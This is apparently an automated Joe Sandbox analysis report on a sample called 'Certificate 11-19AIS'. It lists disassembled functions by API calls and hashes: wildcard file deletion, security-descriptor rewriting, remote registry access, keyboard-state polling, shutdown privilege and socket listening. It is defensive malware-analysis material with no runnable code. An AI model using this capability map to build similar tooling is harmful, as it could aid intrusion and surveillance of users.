                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                              • String ID: *.*
                                                                              • API String ID: 3566783562-438819550
                                                                              • Opcode ID: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                                              • Instruction ID: 74e79169d9a37842e956a0029253f5a9554dda02fd931492d2f58b276b74ddfc
                                                                              • Opcode Fuzzy Hash: 1c2af3c5224d4a94ce9955e3c78a8bc52786d1ade3feb69ce72c8572489b0d96
                                                                              • Instruction Fuzzy Hash: 346146725083459FD710EF60C848AAEB7E8FF89314F04491EE989C7292EB35E945CF92
                                                                              Function 007EA66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 007EABD7
                                                                                • Part of subcall function 007EABBB: GetLastError.KERNEL32(?,007EA69F,?,?,?), ref: 007EABE1
                                                                                • Part of subcall function 007EABBB: GetProcessHeap.KERNEL32(00000008,?,?,007EA69F,?,?,?), ref: 007EABF0
                                                                                • Part of subcall function 007EABBB: HeapAlloc.KERNEL32(00000000,?,007EA69F,?,?,?), ref: 007EABF7
                                                                                • Part of subcall function 007EABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 007EAC0E
                                                                                • Part of subcall function 007EAC56: GetProcessHeap.KERNEL32(00000008,007EA6B5,00000000,00000000,?,007EA6B5,?), ref: 007EAC62
                                                                                • Part of subcall function 007EAC56: HeapAlloc.KERNEL32(00000000,?,007EA6B5,?), ref: 007EAC69
                                                                                • Part of subcall function 007EAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007EA6B5,?), ref: 007EAC7A
                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007EA6D0
                                                                              • _memset.LIBCMT ref: 007EA6E5
                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007EA704
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA715
                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 007EA752
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007EA76E
                                                                              • GetLengthSid.ADVAPI32(?), ref: 007EA78B
                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007EA79A
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 007EA7A1
                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007EA7C2
                                                                              • CopySid.ADVAPI32(00000000), ref: 007EA7C9
                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007EA7FA
                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007EA820
                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007EA834
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                              • String ID:
                                                                              • API String ID: 3996160137-0
                                                                              • Opcode ID: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                                              • Instruction ID: 048d03db4661453bfedef72e9a5c629f341bc4a9a3f2bf3e90cc4543d39f046d
                                                                              • Opcode Fuzzy Hash: 9493cd8b7f8bb740dcc41ee619bdee3b92dd3ca6b009fad027f9052bb4f324b0
                                                                              • Instruction Fuzzy Hash: 2B514C71901249BFDF05DFA6DC44AEEBBB9FF48300F048529F911AA291D738AE05CB61
                                                                              Function 007F63F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                                                • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                                              • _wcscat.LIBCMT ref: 007F6441
                                                                              • __wsplitpath.LIBCMT ref: 007F645F
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007F6474
                                                                              • _wcscpy.LIBCMT ref: 007F64A3
                                                                              • _wcscat.LIBCMT ref: 007F64B8
                                                                              • _wcscat.LIBCMT ref: 007F64CA
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F64DA
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F64EB
                                                                              • FindClose.KERNEL32(00000000), ref: 007F6506
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                              • String ID: \*.*$p1ou`Kpu
                                                                              • API String ID: 2643075503-531078103
                                                                              • Opcode ID: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                                              • Instruction ID: ad5a280189c27ad8a5b4283dce76648fce8addf29b8d5048e952dafb5071a756
                                                                              • Opcode Fuzzy Hash: 6091b9a25de45528fb587853f68dcecfeb33502ed6187efb0307b6c19aba7459
                                                                              • Instruction Fuzzy Hash: 9C314BB2409388AEC721EBA488899EF77EC6F55310F44491AF6D9C3241EA39D50987A7
                                                                              Function 007B6F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                              • API String ID: 0-4052911093
                                                                              • Opcode ID: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                                              • Instruction ID: 2ec50c8f2c19355d0c40c9179b3d403d68a1c93ff38275fb0c67efe306404125
                                                                              • Opcode Fuzzy Hash: 26d40b820e24ebd73d381c2d3bdc98302e331be1d2078c49f236013c9edf4392
                                                                              • Instruction Fuzzy Hash: 95724071E04219DBDB28CF98D8817EEB7B5FF88310F14416AE915EB281DB749E81DB90
                                                                              Function 008131BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0081328E
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0081332D
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 008133C5
                                                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00813604
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00813611
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1240663315-0
                                                                              • Opcode ID: 1e3363ac239ec3cbd622aa51ad81d2a1cf494d45380c0a43c16d1e8c38e26c4d
                                                                              • Instruction ID: 8e30ed381af204329e4e69a8876a5a79d82cb81c4e2a542552870e04e2d32247
                                                                              • Opcode Fuzzy Hash: 1e3363ac239ec3cbd622aa51ad81d2a1cf494d45380c0a43c16d1e8c38e26c4d
                                                                              • Instruction Fuzzy Hash: 82E15A31204200EFCB15DF28C995EAABBE9FF88714F04896DF54ADB261DB34E945CB52
                                                                              Function 007F2B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 007F2B5F
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 007F2BE0
                                                                              • GetKeyState.USER32(000000A0), ref: 007F2BFB
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 007F2C15
                                                                              • GetKeyState.USER32(000000A1), ref: 007F2C2A
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 007F2C42
                                                                              • GetKeyState.USER32(00000011), ref: 007F2C54
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 007F2C6C
                                                                              • GetKeyState.USER32(00000012), ref: 007F2C7E
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 007F2C96
                                                                              • GetKeyState.USER32(0000005B), ref: 007F2CA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                                              • Instruction ID: 87299855103663aa48003f317b131209d4079c371cd0242163749ec4681c072e
                                                                              • Opcode Fuzzy Hash: 6628917f01ea60817f3cd333edc9f5ffe42ea81910880f0e649640e3b6859e26
                                                                              • Instruction Fuzzy Hash: BC4191746047CE69FF359B6488043B9BEA0AB11354F048459DBC6563C3EBAC99C9C7B2
                                                                              Function 00806D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                              • String ID:
                                                                              • API String ID: 1737998785-0
                                                                              • Opcode ID: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                                              • Instruction ID: c4cfbc510592dd242cabdbc9dcebf7d9f72ebec0cf2724055efb95eb6d9d5ca8
                                                                              • Opcode Fuzzy Hash: d92ebc79c5a9ac4b2d53cd7f95fa1551b33d8e18c4d77f8873f26a50929e31fe
                                                                              • Instruction Fuzzy Hash: 62219F31300614DFDB11AF64EC4AF2E77A8FF54710F04841AF91ADB2A1EB75E8218B90
                                                                              Function 0080C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007E9ABF: CLSIDFromProgID.OLE32 ref: 007E9ADC
                                                                                • Part of subcall function 007E9ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 007E9AF7
                                                                                • Part of subcall function 007E9ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 007E9B05
                                                                                • Part of subcall function 007E9ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 007E9B15
                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0080C235
                                                                              • _memset.LIBCMT ref: 0080C242
                                                                              • _memset.LIBCMT ref: 0080C360
                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0080C38C
                                                                              • CoTaskMemFree.OLE32(?), ref: 0080C397
                                                                              Strings
                                                                              • NULL Pointer assignment, xrefs: 0080C3E5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                              • String ID: NULL Pointer assignment
                                                                              • API String ID: 1300414916-2785691316
                                                                              • Opcode ID: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
                                                                              • Instruction ID: 2bcf291ea158996e8a1a363690e4613cda3adab42f68c151502503324cf9ce1a
                                                                              • Opcode Fuzzy Hash: d437d0260f97f128f4e9d4b6387a48e5ece98306d8a24fb80c46723952bfbc8e
                                                                              • Instruction Fuzzy Hash: CC911871D00218EBDB10DF94DC95EDEBBB9FF48710F10812AE515A7281EB746A45CFA0
                                                                              Function 007F79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                                • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                                • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                                              • ExitWindowsEx.USER32(?,00000000), ref: 007F7A0F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                              • String ID: $@$SeShutdownPrivilege
                                                                              • API String ID: 2234035333-194228
                                                                              • Opcode ID: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                                              • Instruction ID: 7dd424496a01bc103b46ba392988b8e3af6016d7cd78f42369ee2fda0e060b96
                                                                              • Opcode Fuzzy Hash: 671209a454b3eae9ce43f022be2a6ec768d8a84d495dea25e18f3cdd03192423
                                                                              • Instruction Fuzzy Hash: 6F01F771659319AAF72C567CDC5FFBF3258AB04750F268824FB13E22D2E9AD5E00C1A0
                                                                              Function 00808C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00808CA8
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808CB7
                                                                              • bind.WSOCK32(00000000,?,00000010), ref: 00808CD3
                                                                              • listen.WSOCK32(00000000,00000005), ref: 00808CE2
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808CFC
                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00808D10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                                                              • String ID:
                                                                              • API String ID: 1279440585-0
                                                                              • Opcode ID: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                                              • Instruction ID: be7723ffb9eeb9ad6b887b61eaf395b1c7f24e2a72966310d83086f0c1bea2db
                                                                              • Opcode Fuzzy Hash: a4cb58cebd98d1a4e1b4d55312dc7256abf3f304aa3401f87b7e1b4b4f78fc81
                                                                              • Instruction Fuzzy Hash: 6C21D031600204EFCB60AF28DD49B6EB7A9FF48314F108558F956E73D2CB74AD418B61
                                                                              Function 007F6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007F6554
                                                                              • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007F6564
                                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 007F6583
                                                                              • __wsplitpath.LIBCMT ref: 007F65A7
                                                                              • _wcscat.LIBCMT ref: 007F65BA
                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 007F65F9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 1605983538-0
                                                                              • Opcode ID: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                                              • Instruction ID: e9971ac353388e80e530e5a56c04ed5212affa2adccdd4463a43774a9962dd6a
                                                                              • Opcode Fuzzy Hash: a9be11aa4aece8d2f58e9fcd767856517e914a3e43574ae2537887830257c9de
                                                                              • Instruction Fuzzy Hash: 0421877190021CEBDB10ABA4DD88FEDB7BCAB45300F5004A5F605E7241EB759F95CB60
                                                                              Function 0080923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00809296
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008092B9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 4170576061-0
                                                                              • Opcode ID: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                                              • Instruction ID: f71ecc390c418bea2128311aa65ba1fea2618780379eeffc3029c61aedd01ae9
                                                                              • Opcode Fuzzy Hash: 06422c42cf867723c500334ead9563d8cd3586206520b330d76fb1e7b3c99268
                                                                              • Instruction Fuzzy Hash: 42418C70600204AFDB14AB688C4AF7EB7E9EF44724F14445CFA56EB2D2DA789D018B91
                                                                              Function 007FEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007FEB8A
                                                                              • _wcscmp.LIBCMT ref: 007FEBBA
                                                                              • _wcscmp.LIBCMT ref: 007FEBCF
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 007FEBE0
                                                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 007FEC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 2387731787-0
                                                                              • Opcode ID: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                                              • Instruction ID: efb8bd4a3d095d7bc49630a1105eb3165c09a19f85ab41b84099f4c20ab9ef99
                                                                              • Opcode Fuzzy Hash: 326519e106fbe944634f426f1dc3c7b12a11659903e6044711acb53abacbef7b
                                                                              • Instruction Fuzzy Hash: CC41BB35604306DFC718DF28C490EAAB7E5FF49320F10455EFA5A8B3A1DB39A940CBA1
                                                                              Function 00818111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                              • String ID:
                                                                              • API String ID: 292994002-0
                                                                              • Opcode ID: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                                              • Instruction ID: 2915c7030a7692783829f092d2789b89a3e63d6b57f7a973d76c535476fec2ff
                                                                              • Opcode Fuzzy Hash: 3de158d83e8109fac0bcbd32118887dd76a22fdd7d1bbd41cf6850516855ea62
                                                                              • Instruction Fuzzy Hash: 8E119332300215EBE7211F26EC46FAE779CFF94760B040819F845D7241CF34D98386A4
